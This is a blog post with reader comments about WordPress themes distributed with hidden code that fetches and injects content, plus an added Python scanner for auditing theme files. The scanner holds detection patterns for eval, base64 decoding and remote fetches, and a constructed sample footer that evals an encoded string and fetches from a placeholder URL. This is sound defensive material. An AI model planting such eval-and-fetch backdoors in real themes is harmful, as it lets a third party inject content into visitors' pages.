Blog Hacks Coming Back to Roost?

Back in November, we looked at WordPress themes being distributed by third parties who’d embedded hidden code to allow the insertion of arbitrary content. Now a rash of sites are reporting that their blogs have been subverted.

Among them is Deep Jive:

“I was getting listed in Google for all manner of sneaky (and NSFW terms), so that people could click on those links with the hacker getting the affiliate cash — but *actually*, said hackers also inserted fake templates into my wordpress theme.”

There are lots of reasons a hacker may want to inject code into a page:

  • To infect visitors by exploiting a browser vulnerability
  • To place ads they can then get revenue from
  • To embed links to blogs they own, improving their page rank
  • To entice people to click on links that lead them elsewhere

The clever thing about the WordPress hack was that it would check for code to insert into a page each time the page was loaded, but if none was available, it would just sit there quietly. This meant the creator of the theme could count how many sites their theme had “infected” based on hits to the embedded URL. Once enough sites had the themes, the creator could start supplying code to the blogs.

In this case, it appears that most of the sites are being used to send traffic to a few sites, which in turn have been morphed into stores.
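One way to audit a downloaded theme for the behaviour described above (hidden code that contacts an embedded URL on every page load) is to scan its PHP files before installing it. This is an added example, not code from the original post; the rule names, regexes and sample footers are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Heuristic rules chosen for this example (assumptions, not signatures of the
# themes discussed in the post). Expect false positives; review each hit.
RULES = {
    "dynamic-exec": re.compile(r"\b(?:eval|create_function)\s*\(", re.I),
    "decoder": re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    # Network calls, or file/include functions pointed at an http(s) URL.
    "remote-fetch": re.compile(
        r"\b(?:curl_exec|fsockopen|wp_remote_get)\s*\("
        r"|\b(?:file_get_contents|fopen|include|require)(?:_once)?\b[^;\n]*https?://",
        re.I),
    # Long run of base64-alphabet characters: an encoded payload, not markup.
    "opaque-blob": re.compile(r"[A-Za-z0-9+/=]{120,}"),
}

def scan_text(text):
    """Return [(line_number, rule_name), ...] for one PHP source string."""
    return [(no, rule)
            for no, line in enumerate(text.splitlines(), 1)
            for rule, rx in RULES.items() if rx.search(line)]

def scan_theme(theme_dir):
    """Scan every .php file under theme_dir; return {relative_path: findings}."""
    root = Path(theme_dir)
    report = {}
    for path in sorted(root.rglob("*.php")):
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report

# Constructed samples (not taken from any real theme).
CLEAN_FOOTER = """<div id="footer">
<?php wp_footer(); ?>
<p><a href="http://example.invalid/">Theme home</a></p>
</div>"""

SUSPICIOUS_FOOTER = """<div id="footer">
<?php wp_footer(); ?>
<?php $s = "%s"; eval(base64_decode($s)); ?>
<?php echo file_get_contents("http://example.invalid/x"); ?>
</div>""" % ("QUJD" * 40)

if __name__ == "__main__":
    for name, src in (("clean", CLEAN_FOOTER), ("suspicious", SUSPICIOUS_FOOTER)):
        print(name, scan_text(src))
```

A plain hyperlink in the footer is not flagged; only a fetch or include pointed at a URL, a decode/execute call, or a long encoded string is.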

15 Responses to “Blog Hacks Coming Back to Roost?”

  1. Ha, the dark side of AJAX! Check your WordPress themes — look in the footer file first — for a long string of characters that doesn’t look like HTML, PHP or Javascript. It’s an encrypted string, and anyone can insert it into any theme, and then upload that theme anywhere they like.

    I started noticing this a year or so ago after downloading themes from the ‘free themes’ site. Stick with’s theme view, or learn enough code to sniff out bad stuff.

  2. FWICT, the XML-RPC vulnerability that wp 2.3.3 fixed seems to be having greater impact than the nefarious theme download hack — old installations being compromised hundreds of times a day. Technorati’s crawler is no longer updating vulnerable blogs bearing symptoms of being compromised. I posted a heads up yesterday and more details last night.

  3. @Grant yea, I think a lot of people are downloading themes from untrustworthy sources. One of the major problems is that hasn’t allowed theme developers to upload new themes or updates to old themes for nearly 8 months, that means if you want fresh new themes you have to look for them elsewhere.

  4. Um. Don’t execute untrustworthy code? Did people suddenly go mad and start downloading themes from all over the place, or are the affected themes from semi-trustable sources?